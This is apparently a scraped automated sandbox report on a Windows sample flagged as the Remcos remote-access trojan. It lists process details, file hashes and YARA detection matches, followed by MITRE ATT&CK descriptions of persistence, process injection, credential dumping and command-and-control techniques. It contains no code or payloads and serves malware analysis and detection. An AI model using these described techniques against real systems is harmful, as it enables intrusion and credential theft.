Commandline:	'C:\Users\Public\Xypgtv\Xypgtv.exe'
Imagebase:	0x400000
File size:	690178 bytes
MD5 hash:	10D42F55D89B6FD42404E470E68F1996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.730552799.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731106098.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731257935.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.729493553.0000000002428000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.728627251.000000000243C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731519002.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 41%, ReversingLabs
Reputation:	low

Analysis Process: Xypgtv.exe PID: 7004 Parent PID: 3424

General

Start time:	09:40:32
Start date:	04/06/2021
Path:	C:\Users\Public\Xypgtv\Xypgtv.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\Xypgtv\Xypgtv.exe'
Imagebase:	0x400000
File size:	690178 bytes
MD5 hash:	10D42F55D89B6FD42404E470E68F1996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749959961.0000000002820000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749327450.000000000284C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750252073.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.751417519.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750787460.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749703567.0000000002838000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.751016095.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr) Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750523839.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
Reputation:	low

Analysis Process: Xypgtv.exe PID: 6480 Parent PID: 6740

General

Start time:	09:40:54
Start date:	04/06/2021
Path:	C:\Users\Public\Xypgtv\Xypgtv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Xypgtv\Xypgtv.exe
Imagebase:	0x400000
File size:	690178 bytes
MD5 hash:	10D42F55D89B6FD42404E470E68F1996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: Xypgtv.exe PID: 6324 Parent PID: 7004

General

Start time:	09:41:03
Start date:	04/06/2021
Path:	C:\Users\Public\Xypgtv\Xypgtv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\Xypgtv\Xypgtv.exe
Imagebase:	0x400000
File size:	690178 bytes
MD5 hash:	10D42F55D89B6FD42404E470E68F1996
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	File monitoring, Process command-line parameters
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report V8IB839cvz.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Remcos

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre